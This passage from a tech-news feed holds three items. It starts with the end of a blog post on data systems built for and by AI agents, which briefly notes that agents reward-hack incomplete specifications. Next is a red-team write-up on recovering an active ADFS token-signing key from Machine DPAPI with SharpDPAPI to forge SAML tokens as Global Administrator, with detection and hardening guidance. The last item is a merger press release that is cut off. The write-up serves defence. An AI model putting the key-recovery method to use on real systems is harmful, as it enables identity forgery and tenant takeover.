<p>Beyond shared state, other concerns emerge when trying to support an army of agents, including what to do when agents fail, how agents should communicate with each other (directly or through intermediate shared state), and how we should deal with straggler agents. There have been some developments in supporting durable multi-agent execution, such as <a href="https://temporal.io/solutions/ai">Temporal</a>, but it remains to be seen if such solutions will apply at scale across thousands of agents. On the topic of communication, we need mechanisms to enable agents to negotiate with each other. Imagine four developer agents attempting to reach consensus on a shared schema, with distinct but overlapping objectives. In a human setting, this would involve iterative discussion and compromise; for agentic swarms, we must define the mechanisms that allow them to converge on a design that reflects the underlying goals of their respective principals. Or if agents are all requiring access to a limited resource, again communication will be necessary. It remains to be seen if this is best done via centralized coordination, or if a decentralized approach is necessary.</p>

<h2>Data Systems By Agents</h2>

<p>Finally, if intelligence is effectively free, then we can employ this intelligence to synthesize new data systems from scratch. Indeed, in many settings, general-purpose data systems may be overkill, as they have to support every schema, query, and hardware target. Given a workload, recent work, including <a href="https://arxiv.org/abs/2603.02001">Bespoke OLAP</a> and <a href="https://arxiv.org/abs/2603.02081">GenDB</a>, has shown that one can use an agentic pipeline to synthesize a complete, workload-specific analytical engine—in minutes to a few hours, at a cost of a few dollars. The engines are disposable: when the workload shifts, one can simply regenerate them. Analogously, our work has shown that one can synthesize custom <a href="https://arxiv.org/abs/2605.24096">key-value stores</a> from scratch, targeted to the workload. In fact, modern IDEs, such as <a href="https://kiro.dev/">Kiro</a>, elevate specifications for systems development to be a first-class citizen.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/synthesize-from-scratch.png" alt="A robot agent with a hammer and chisel carving a database character out of a block of stone" width="500"><br>
<i>
Agents Can Synthesize Custom Data Systems From Scratch
</i>
</p>

<p>The main issue, however, is that specifications are typically imperfect, and don’t cover all corner cases. Present-day agents will exploit the missing specifications to reward-hack their way to a high performance metric. In our custom key-value store work, we found that one way to alleviate this is to have auxiliary verification agents trying to generate test cases that catch the exploitation of corner cases, essentially expanding the specification. Yet another approach is to both generate a system and a proof for its correctness together, for which we have found some <a href="https://arxiv.org/abs/2605.23109">early success</a>, but more needs to be done to solidify the approach. Further, it remains to be seen what is the best way to solicit human-written specifications for a system—can this be done in an iterative, human-in-the-loop manner, as opposed to a one-shot, incomplete one. Indeed, human-written specifications are incomplete even for manually authored software, so one would expect that future agents that are more aligned will increasingly exercise better judgement when making design decisions.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/synthesis-pipeline.png" alt="Pipeline diagram where a system builder provides a specification, planner and coder agents generate code, the code is evaluated for correctness and performance, and critic and auditor agents provide feedback and catch reward hacking" width="100%"><br>
<i>
One Possible Data System Synthesis Pipeline <a href="https://arxiv.org/abs/2605.24096">[From Here]</a>
</i>
</p>

<p>Other questions here involve testing whether starting from a mature system (e.g., Postgres) and removing components/functionality can lead to higher performance or more user trust. Separately, is there an opportunity to make the design composable, comprising various verified components that are mixed and matched given a workload? For example, perhaps the workload hasn’t changed enough for the storage layer to be updated, but perhaps the query optimizer requires changes. A perhaps more viable proposition involves employing agents coupled with proof systems to target critical parts of the code associated with formal proofs, rather than doing so for the entire system.</p>

<p>A final opportunity here is to move away from the traditional data systems stack with clearly-defined interfaces (e.g., parser, query optimizer, storage manager, …) — that were each largely the prerogative of a single human team to manage. Instead, agents can find new ways to “blend” these components together, perhaps identifying new optimization opportunities as a result. Agents can also fill in missing gaps in functionality to make existing systems much more feature-complete, or reach feature-parity with other competing systems—or analogously, continuously refining open-source systems in response to feature requests or issues (perhaps filed by other agents!) Doing so in a way that prioritizes correctness, long-term maintenance, and human interpretability will be a challenge.</p>

<h2>Looking Further Ahead</h2>

<p>In the era of near-free intelligence, data systems matter more than ever. As agents take on the bulk of knowledge work, the workload for data systems will change, the substrate they need to run on will have to be built, and increasingly, they will participate in designing data systems themselves. Each of these shifts opens up a new, exciting research agenda.</p>

<p>
<img src="https://bair.berkeley.edu/static/blog/intelligence-is-free-now-what/co-evolution.png" alt="A half-database, half-robot character next to a yin-yang symbol formed by a database and a robot agent" width="600"><br>
<i>
Co-Evolution of Data Systems and Agents
</i>
</p>

<p>Looking further out, the boundaries between agents and data systems will likely start to blur. For instance, agents may design the data systems they themselves run on, defining both the interfaces as well as the system components underneath. Both the interfaces and internals can be evolved over time by agents in a form of recursive self-improvement. There is also an opportunity to rethink data systems as a holistic source of truth for the entirety of relevant state: including raw data, memory, and coordination state, further erasing the distinctions between the data that is being queried by agents and data generated as a result of agentic activity. Finally, data systems may themselves incorporate agentic components, fundamentally evolving from passive computation engines into intelligent, proactive, self-optimizing architectures. It is hard to predict what the future may hold. We’re in for a wild ride!</p>

<h2>Acknowledgments</h2>

<p>The perspective and ongoing work described in this post are the product of joint research and many discussions with wonderful collaborators at the <a href="https://epic.berkeley.edu/">EPIC Data Lab</a>, <a href="https://dsf.berkeley.edu/">Data Systems &amp; Foundations</a> group, and the broader Berkeley AI-Systems community. Thank you all!</p>

<p>BibTex for this post:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@misc{intelligence-is-free-blog,
  title={Intelligence is Free, Now What? Data Systems for, of, and by Agents},
  author={Aditya G. Parameswaran and Shubham Agarwal and Kerem Akillioglu and Shreya Shankar
          and Sepanta Zeighami and Rishabh Iyer and Matei Zaharia and Alvin Cheung
          and Natacha Crooks and Joseph Gonzalez and Joseph Hellerstein and Ion Stoica},
  howpublished={\url{https://bair.berkeley.edu/blog/2026/07/07/intelligence-is-free-now-what/}},
  year={2026}
}
</code></pre></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The ‘Ghost’ in the Database: Recovering Active ADFS Signing Keys via Machine DPAPI]]></title>
<description><![CDATA[Written by: Shebin Mathew

Introduction 
The "Golden SAML" technique, first described by CyberArk researchers in 2017, and further detailed by Mandiant researchers in 2021, remains one of the most effective methods for threat actors to forge identity assertions in the Microsoft ecosystem. By obta...]]></description>
<link>https://tsecurity.de/de/3652290/it-security-nachrichten/the-ghost-in-the-database-recovering-active-adfs-signing-keys-via-machine-dpapi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3652290/it-security-nachrichten/the-ghost-in-the-database-recovering-active-adfs-signing-keys-via-machine-dpapi/</guid>
<pubDate>Tue, 07 Jul 2026 19:07:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Shebin Mathew</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Introduction</span><strong> </strong></h3>
<p><span>The "Golden SAML" technique, first described by </span><a href="https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps" rel="noopener" target="_blank"><span>CyberArk researchers</span></a><span> in 2017, and further detailed by </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/abusing-replication-stealing-adfs-secrets-over-the-network"><span>Mandiant researchers in 2021</span></a><span>, remains one of the most effective methods for threat actors to forge identity assertions in the Microsoft ecosystem. By obtaining the private key of an ADFS token-signing certificate, an attacker can authenticate as any user to any SAML-federated application, bypassing multifactor authentication (MFA), conditional access, and all identity-based controls.</span></p>
<p><span>However, during a recent red team engagement, Mandiant discovered that when ADFS certificates are manually rotated, configuration drift can silently leave active signing keys exposed in Machine DPAPI. Specifically, Mandiant discovered </span><span>that in environments where AutoCertificateRollover is disabled and certificates are manually rotated, the database often becomes a 'ghost'—a record that still exists, still decrypts successfully, but references a certificate no longer used for token signing by the ADFS service. This attack vector warrants attention because the underlying configuration is commonly deployed in enterprise environments. The technique avoids direct interaction with components such as LSASS and the live ADFS service process, which are often subject to enhanced monitoring in enterprise environments, and may therefore result in lower visibility depending on the organization’s telemetry coverage. This post details how adversaries may exploit this TTP to forge high-privilege SAML tokens and provides the blueprint to defend against it.</span></p>
<h3><span>Technical Insight: Encountering the ‘Ghost Certificate’</span></h3>
<p><span>Analysts followed the standard DKM extraction path, retrieving the encrypted blob from the WID database and decrypting it using the DKM material stored in Active Directory. The extraction succeeded, but the recovered certificate was no longer valid for token signing, and Entra ID rejected the resulting tokens with</span> <code>AADSTS500172</code><span> due to invalid signing material. Although structurally correct, the artifact is not usable for authentication, as the active signing key resides in the system’s machine-scoped cryptographic store, protected by Windows Machine DPAPI and managed through the operating system’s cryptographic subsystem. Successfully obtaining this active key allows an attacker to forge valid SAML assertions for any user, bypassing the need for user credentials and multi-factor authentication, and granting unauthorized access to any SAML-federated application including Microsoft 365 and Entra ID within the organization's environment.</span></p>
<p><span>Analysis revealed that</span><span> </span><code>AutoCertificateRollover</code><span> </span><span>had been disabled and a manual rotation had been performed. Confirmation was obtained directly via</span><span> </span><code>Get-AdfsProperties</code><span>, which returned</span><span> </span><code>AutoCertificateRollover: False</code><span>, </span><span>indicating that certificate lifecycle management had been delegated to manual administrative processes. While the ADFS service used a new valid key for signing, the WID configuration database was never updated to reflect the new certificate—leaving an expired "ghost" entry as the only record. This drift condition surfaces via Microsoft Event ID 385, which indicates certificate validity warnings in the ADFS service. Notably, this event self-resolves when</span><span> </span><code>AutoCertificateRollover</code><span> </span><span>is re-enabled and a subsequent certificate rollover is performed; in environments where it is disabled and manual rotation is performed without a corresponding database update, it is the observable symptom of this drift condition.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ghost-database-fig1.max-1000x1000.png" alt="ADFS certificate enumeration output showing configuration drift between the WID database and the active host certificate">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="8uqvx">Figure 1: ADFS certificate enumeration output showing configuration drift between the WID database and the active host certificate</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>ADFS maintains private keys in two protection contexts. In </span><strong>Location 1 (User DPAPI)</strong><span>, encrypted key blobs may exist on disk, but the DPAPI protection is tied to the service account's SID and associated DPAPI masterkey material. In the assessed environment, the domain DPAPI backup key approach successfully decrypted masterkey material for interactive user profiles, but returned no decryptable material associated with the ADFS service account profile. All subsequent offline decryption attempts similarly failed, consistent with the masterkey not being recoverable through the evaluated on-disk recovery approach in this environment—though this observation is bounded to the assessed environment and does not represent a universal architectural property of all ADFS deployments.</span></p>
<p><strong>Location 2 (Machine RSA)</strong><span> does not rely on a user-specific logon session. Instead, the key material is protected using Machine DPAPI, leveraging the</span><span> </span><code>DPAPI_SYSTEM</code><span> </span><span>LSA secret together with machine masterkeys available to sufficiently privileged SYSTEM-level contexts.</span></p>
<h4><span>Why the WID Path Misses This Key</span></h4>
<p><span>In ADFS environments experiencing configuration drift—commonly arising during manual certificate rotations where</span><span> </span><code>AutoCertificateRollover</code><span> </span><span>is disabled—the ADFS service host can successfully bind to a newly provisioned signing certificate at the operating-system level, ensuring continued service operation. However, the WID configuration database may not reflect the current signing certificate, resulting in stale certificate metadata.</span></p>
<p><span>This divergence between configuration and runtime state is the condition that ADFS Event ID 385 is designed to flag. As a consequence, extraction techniques that rely solely on the WID database and DKM material may return certificates that are no longer used for active signing, leading to rejected assertions in downstream federation scenarios.</span></p>
<h3><span>Understanding How the Machine DPAPI Store Becomes Populated</span></h3>
<p><span>Understanding how the Machine DPAPI store becomes populated requires examining how ADFS persists its token-signing key material. During initial deployment, automatic certificate rollover, or manual certificate rotation, ADFS persists its RSA private key material in the machine-scoped CAPI key store at </span><code>C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\</code><span>, protected using machine DPAPI context rather than a user-bound DPAPI context. SharpDPAPI</span><span> </span><code>/machine</code><span> </span><span>enumeration in the assessed environment confirmed that the active machine key material resided under this path, while the CNG</span><span> </span><code>Crypto\Keys</code><span> </span><span>store was not observed in use in the assessed environment.</span></p>
<p><span>The protection chain relies on the</span><span> </span><code>DPAPI_SYSTEM</code><span> </span><span>LSA secret together with machine masterkeys associated with the S-1-5-18 security context, stored in</span><span> </span><code>C:\Windows\System32\Microsoft\Protect\S-1-5-18\</code><span> </span><span>as DPAPI-protected key material—both components ultimately resolvable only within highly privileged SYSTEM-level contexts on the host. The corresponding certificate is enrolled into the </span><code>LocalMachine\My</code><span> </span><span>certificate store, from which ADFS retrieves the associated private key during token-signing operations.</span></p>
<p><span>The architectural rationale for machine-scoped key storage is operational resilience. A machine-scoped key remains usable across service account password changes, gMSA rotations, system reboots, and service restarts without requiring key reprovisioning or dependency on a specific interactive logon session. This design ensures that the ADFS service can consistently access the signing key regardless of changes to the underlying service account credentials.</span></p>
<p><span>However, this same design choice has important security implications. Because the private key is protected using Machine DPAPI rather than a user-bound DPAPI context, a sufficiently privileged local process capable of accessing the machine key store and associated DPAPI artifacts may be able to recover the key material independently of the original service logon session. As a result, under certain conditions, recovery of the active ADFS token-signing private key may be achievable without direct interaction with LSASS memory or the live ADFS service process itself, potentially reducing visibility to defenses primarily focused on credential dumping or process-memory access behaviors.</span></p></div>
<div class="block-paragraph_advanced"><div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1">
<tbody>
<tr>
<td>
<p><strong>KEY DESIGN IMPLICATION</strong></p>
<p><span>ADFS persists its token-signing private key material in the machine-scoped key store, protected using Machine DPAPI semantics. This is a documented behavior enabling machine-scoped key persistence that survives service account changes, credential rotations, and service restarts.</span></p>
<p><span>However, this design introduces an operational security implication that is not commonly emphasized in standard ADFS hardening guidance: private keys stored within the machine key store are protected using this protection model and may be recoverable by a sufficiently privileged SYSTEM-level context through access to the </span><span>DPAPI_SYSTEM</span><span> LSA secret and machine masterkeys available locally on the host.</span></p>
<p><span>As a result, recovery of the active ADFS token-signing private key may be achievable without direct interaction with LSASS memory or the live ADFS service process itself, potentially reducing visibility to security controls primarily focused on credential dumping or process-memory access behaviors.</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div></div>
<div class="block-paragraph_advanced"><h3><span>Attack Flow: Machine DPAPI Key Recovery to SAML Forgery</span></h3></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ghost-database-fig2.max-1000x1000.png" alt="Machine DPAPI extraction flow—five-step process from SYSTEM execution to SAML assertion">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ggznt">Figure 2: Machine DPAPI extraction flow—five-step process from SYSTEM execution to SAML assertion</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/ghost-database-fig3.max-1000x1000.png" alt="‘SharpDPAPI /machine’ output confirming successful recovery of the active ADFS token-signing private key from the machine DPAPI store">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ggznt">Figure 3: ‘SharpDPAPI /machine’ output confirming successful recovery of the active ADFS token-signing private key from the machine DPAPI store</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>The recovered key was used to forge a SAML assertion impersonating a Global Administrator identity, which Entra ID accepted as a valid authentication assertion, resulting in authenticated access at </span><strong>Global Administrator</strong><span> privilege level within the federated Microsoft 365 tenant.</span></p>
<h3><span>Detection and Hunting</span></h3>
<p><span>Defenders should prioritize visibility into operating system-level cryptographic operations and identity issuance behavior, rather than relying solely on application-layer configuration stores.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>SACL-Based Object Access Monitoring:</strong><span> Configure object access auditing via SACLs on</span><span> </span><code>C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\</code><span> </span><span>and</span><span> </span><code>C:\Windows\System32\Microsoft\Protect\S-1-5-18\</code><span>. </span><span>When configured correctly, this generates </span><strong>Security Event ID 4663</strong><span> for file access attempts. Coverage depends on SACL configuration and access paths; treat this as supporting evidence in correlation-based detection rather than a stand-alone signal.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>ADFS Token Issuance Consistency:</strong><span> Monitor for inconsistencies between primary authentication events and token issuance events in ADFS audit logs. Relevant events include token issuance and claims processing records (Event IDs 299, 1200-series, depending on ADFS version and audit configuration). The objective is to identify token issuance that cannot be clearly correlated to a preceding authentication context. This is most effective when normal authentication patterns per relying party trust are baselined.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Federated Identity Monitoring in Entra ID:</strong><span> Entra ID sign-in logs will record an accepted forged assertion as a standard federated sign-in event. Detection requires cross-correlating Entra ID sign-in records against ADFS-side issuance logs—neither source in isolation is sufficient. For privileged accounts, focus on unexpected Internet Protocol (IP) ranges, claim set deviations,and user-agent inconsistencies.</span></p>
</li>
</ul>
<h3><span>Mitigation and Remediation</span></h3>
<p><span>ADFS infrastructure should be treated as Tier 0 identity infrastructure, </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452"><span>equivalent in criticality to Domain Controllers</span></a><span>. If SYSTEM access is achieved on an ADFS host, the signing key must be considered compromised.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Hardware-Backed Key Protection:</strong><span> Migrate token-signing certificates to a Hardware Security Module (HSM). HSM-backed keys ensure private key material does not exist in software-accessible storage on the host, eliminating the Machine DPAPI extraction path entirely.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>gMSA Service Identity:</strong><span> </span><span>Run ADFS services using Group Managed Service Accounts to automate credential rotation and reduce operational drift in service identity management. While this does not directly address machine-scoped key protection, it eliminates manual credential management as a contributing factor to configuration drift.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Tier 0 Administrative Controls:</strong><span> Govern ADFS servers with strict Tier 0 controls: restricted administrative access pathways, dedicated Privileged Access Workstations (PAWs), separation from general server administration domains, and enhanced privileged access monitoring.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Certificate Rotation and Configuration Validation:</strong><span> If compromise is suspected, rotate the token-signing certificate and validate consistency across ADFS configuration, the </span><span> </span><code>LocalMachine\My</code><span> </span><span>store, and federation metadata. Do not rely on a single source of truth. For environments with AutoCertificateRollover disabled, manual rotation must include updating ADFS via </span><code>Set-AdfsCertificate</code><span>—installing the certificate alone is insufficient. Validate using</span><code> Get-AdfsCertificate</code><span> after rotation. If Event ID 385 appears afterward, investigate for configuration inconsistency. </span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Multicloud Scope Awareness:</strong><span> A compromised ADFS token-signing key affects all SAML relying party trusts, not just Microsoft services. Organizations using ADFS for identity federation across other software-as-a-service (SaaS) platforms should treat ADFS as Tier 0 infrastructure and audit all relying party trusts. Migrating away from ADFS-based federation (e.g., to native OIDC federation) removes this specific attack path.</span></p>
</li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Envirotech Vehicles Closes Merger with Azio AI Ahead of Schedule, Positioning Combined Company to Capture $487 Billion 2026 AI Infrastructure Opportunity]]></title>
<description><![CDATA[Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.



Envirotech Vehicles, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of ...]]></description>
<link>https://tsecurity.de/de/3651654/ai-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3651654/ai-nachrichten/envirotech-vehicles-closes-merger-with-azio-ai-ahead-of-schedule-positioning-combined-company-to-capture-487-billion-2026-ai-infrastructure-opportunity/</guid>
<pubDate>Tue, 07 Jul 2026 15:19:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p><em>Revised transaction structure enables immediate closing, accelerating the Company’s strategic pivot toward AI data centers, enterprise GPU compute, and digital power infrastructure.</em></p>



<p><a href="https://www.evtvusa.com/" target="_blank" rel="noreferrer noopener">Envirotech Vehicles</a>, Inc. (NASDAQ: EVTV) (“EVTV” or the “Company”) today announced the successful completion of its merger with Azio AI Corporation (“Azio AI”) on July 2, 2026, paving the way for the Company to transform to an AI Datacenter Provider and meeting the growing market demand for artificial intelligence (“AI”) infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; a market that the International Data Corporation (IDC) projects will reach $487 billion in global spending in 2026 and exceed $1 trillion by 2029.<a href="http://docs.google.com/blank">[1]</a> The transaction marks a defining milestone in the Company’s strategic transformation and establishes the foundation for its next phase of commercial execution and long-term growth.</p>



<p>The parties amended the proposed transaction structure to expedite the closing timeline, allowing the combined company to begin operating as a fully integrated public company significantly sooner than originally anticipated. The accelerated closing enables management to immediately focus on commercialization across its expanding AI Datacenter strategy.</p>



<p>With the merger complete and the combined company operating as one organization, management is now fully focused on commercial execution, infrastructure deployment, strategic growth initiatives, and creating long-term shareholder value.</p>



<p>Over the past several months, the Company advanced development activities at its South Texas site and deployed six megawatts of off-grid power for its modular data centers. The Company further secured rights to a 548-acre site with the capacity to scale up to 500 MW, supporting the future development of AI hyperscale data centers.</p>



<p>Management believes these achievements demonstrate that the combined company is entering its next phase with meaningful operational momentum already in place rather than beginning from a standing start. Infrastructure deployment is underway, customer commitments have already been established, commercial execution is actively progressing, and the Company’s corporate structure is now aligned with an operating platform built to support long-term expansion.</p>



<p>The completion of the merger comes at a time when investment in AI infrastructure continues to accelerate globally as enterprises increasingly require access to high-performance computing resources, GPU infrastructure, and scalable digital power solutions. Management believes the combined company is well positioned to capitalize on these long-term industry trends through a diversified infrastructure strategy designed to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations.</p>



<p>Following the closing of the transaction, the Company intends to continue expanding its AI Infrastructure strategy through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships designed to maximize utilization of its power resources while creating multiple long-term revenue opportunities.</p>



<p>In connection with the closing of the merger, Phillip Oldridge has stepped down as Chief Executive Officer. Jason Maddox vacates the President position and is now the Chief Financial Officer. The Company’s Board of Directors appointed Simon Yu as President and Chris Young as Chief Executive Officer, effective immediately.</p>



<p>Mr. Yu is a serial entrepreneur and public markets operator with almost a decade of experience taking companies public, executing capital raises, and scaling businesses. He has previously served in founder, C-suite, and board roles at three publicly traded companies, two of which reached market capitalizations in excess of $1 billion. Mr. Yu has led legal, accounting, and advisory teams through Regulation A+ Tier 2 offerings, PCAOB audits, and public company reporting, alongside leading M&amp;A transactions. As an active early-stage venture investor, he has evaluated investment opportunities across artificial intelligence, SaaS, and B2B technology.</p>



<p>Mr. Young brings extensive experience in launching and leading public companies and investing in and advising emerging technology companies, with a particular focus on artificial intelligence, software innovation, and strategic growth initiatives. Prior to joining EVTV, he served as Chief Executive Officer of Clubhouse Media Group, a publicly traded social media company and an Entrepreneur in Residence at Amplify, where he worked alongside founders and venture-backed technology companies to accelerate commercialization and support the development of high-growth technology businesses.</p>



<p>“Today’s announcement represents far more than the completion of a merger—it marks the beginning of our next chapter,” said Chris Young, Chief Executive Officer of EVTV. “Over the past several months, our teams have been building the operational foundation of this business while simultaneously working toward completing this transaction. With the merger now finalized, we move forward as one company with one leadership team and one strategy, focused on executing against the opportunities in front of us. We believe demand for AI infrastructure, enterprise compute, and digital infrastructure will continue expanding for years to come. Our objective is to build a scalable platform capable of serving that demand while creating long-term value for our shareholders.”</p>



<p>Jason Maddox, Chief Financial Officer of EVTV, added, “Completing this transaction under the amended merger structure allows us to immediately focus on execution. We have already established meaningful operational momentum, and we believe operating as a unified public company enhances our ability to deploy infrastructure, serve customers, pursue strategic growth opportunities, and continue building long-term shareholder value.”</p>



<p>The transaction establishes a unified operating platform designed to support the Company’s long-term growth strategy through continued investment in AI infrastructure, enterprise computing, digital power assets, and digital infrastructure development. Management believes the completion of the merger provides the operational and organizational foundation necessary to pursue the next phase of commercialization while expanding its presence across some of the fastest-growing sectors of the global technology market.</p>



<h3 class="wp-block-heading"><strong>Transaction and Operational Highlights</strong></h3>



<ul class="wp-block-list">
<li>Successfully completed the merger with Azio AI pursuant to an amended and restated merger agreement.</li>



<li>Approximately six megawatts of off-grid digital infrastructure deployed at the Company’s South Texas development site.</li>



<li>Development footprint exceeding 548 acres with the potential to support up to 500 MW of AI infrastructure capacity.</li>



<li>Combined company positioned to accelerate commercialization across AI infrastructure, enterprise GPU compute, digital power solutions, and digital asset mining operations.</li>



<li>Merger consideration consisted of 2,655,157 shares of common stock and 973,450 shares of non-voting convertible preferred stock in exchange for 100% of outstanding capital stock of Azio AI, of which 194,807 shares of common stock were reserved for convertible notes of Azio AI assumed by the Company upon closing.</li>



<li>Each share of preferred stock convertible into 100 shares of Company common stock subject to stockholder approval.</li>



<li>Chris Young appointed Chief Executive Officer and Chairman of the Board.</li>



<li>Simon Yu appointed President.</li>



<li>Jason Maddox appointed Chief Financial Officer.</li>



<li>Phillip Oldridge stepped down as Chief Executive Officer.</li>
</ul>



<p><strong>About Envirotech Vehicles, Inc.</strong></p>



<p>Envirotech Vehicles, Inc. (NASDAQ: EVTV) is a technology infrastructure company focused on developing, owning, and operating artificial intelligence data centers, enterprise GPU compute infrastructure, digital power solutions, and digital asset mining operations. Following its acquisition of Azio AI, the Company operates an integrated AI infrastructure business encompassing AI data center development, the sale and distribution of enterprise GPU systems and server infrastructure, high-performance computing solutions, power hosting, and strategic technology investments, serving enterprise and institutional customers across domestic and international markets. Through this diversified AI infrastructure strategy, the Company is positioned to capitalize on the rapidly expanding global demand for AI infrastructure, compute capacity, digital power, and next-generation AI technologies.</p>



<p>For more information please visit: <a href="http://www.azioai.ai/" target="_blank" rel="noreferrer noopener">www.azioai.ai</a> and for potential partnerships contact: <a href="mailto:AI@PhoenixMGMTconsulting.com" target="_blank" rel="noreferrer noopener">AI@PhoenixMGMTconsulting.com</a></p>



<p><strong>Forward-Looking Statements</strong></p>



<p>This press release contains forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. In some cases, you can identify forward-looking statements by words such as “may,” “will,” “could,” “expect,” “anticipate,” “believe,” “estimate,” “project,” “intend,” “continue,” “potential,” “ongoing,” or the negative of these terms or other comparable terminology, although not all forward-looking statements contain these words. Forward-looking statements include statements regarding the Company’s ability to capitalize on accelerating demand for AI infrastructure, enterprise GPU compute, digital power solutions, data center development, and digital asset infrastructure; the Company’s plans to continue expanding its digital infrastructure platform through AI data center development, enterprise GPU compute solutions, power hosting services, digital asset mining operations, strategic infrastructure investments, and additional commercial partnerships; the Company’s ability to maximize utilization of its power resources while creating multiple long-term revenue opportunities; the ability to continue deploying modular digital infrastructure at the Company’s South Texas site; the anticipated deployment and scaling of NVIDIA B200 and B300 GPU systems; the ability to advance and execute against the Company’s commercial infrastructure pipeline; the anticipated development of the Company’s footprint; the ability to monetize power assets across multiple complementary revenue streams, including AI data centers, enterprise compute infrastructure, power hosting, and digital asset mining operations; customer demand for AI infrastructure, enterprise compute, and digital infrastructure; the Company’s ability to build a scalable platform designed to serve that demand and create long-term shareholder value; and the Company’s broader business strategy and long-term growth objectives.</p>



<p>These statements are based on current expectations and assumptions that involve risks and uncertainties that could cause actual results to differ materially. Most of these factors are outside the Company’s control and are difficult to predict. Factors that may affect actual results include, but are not limited to, the Company’s limited operating history within AI infrastructure and compute operations, project scope, engineering challenges, supply chain constraints, installation timelines, energy availability, finalization of site usage rights, regulatory considerations, equipment performance, ability to raise capital required for expansion activities, changes in digital asset markets, evolving compute demand, market conditions, the Company’s ability to successfully integrate the combined business following the completion of the merger, the risk that the anticipated benefits and synergies of the merger are not realized, the risk of unexpected costs, charges, or expenses resulting from or relating to the merger, potential adverse reactions or changes to business relationships resulting from the completion of the merger, risks related to the diversion of management’s attention from ongoing business operations during the post-closing integration period, the risk that required stockholder approval for the conversion of preferred stock issued in the merger as required by rules of The Nasdaq Stock Market LLC (the “Conversion Proposal”) is not obtained, and additional risks and uncertainties described in the Company’s most recent Annual Report on Form 10-K and subsequent Quarterly Reports on Form 10-Q filed with the SEC, which are available at www.sec.gov. The Company undertakes no obligation to update forward-looking statements except as required by law.</p>



<p><strong><em>Important Information About the Merger and Where to Find it</em></strong></p>



<p>The Company expects to file a proxy statement with the SEC relating to the Conversion Proposal. The definitive proxy statement will be sent to all Company stockholders. Before making any voting decision, investors and security-holders of the Company are urged to read the proxy statement and all other relevant documents filed or that will be filed with the SEC in connection with the Conversion Proposal as they become available because they will contain important information about the amended and restated merger agreement between the parties and the related transactions and the Conversion Proposal to be voted upon by the Company’s stockholders. Investors and security-holders will be able to obtain free copies of the proxy statement and all other relevant documents filed or that will be filed with the SEC by the Company through the website maintained by the SEC at www.sec.gov.</p>



<p><strong><em>Participants in the Solicitation</em></strong></p>



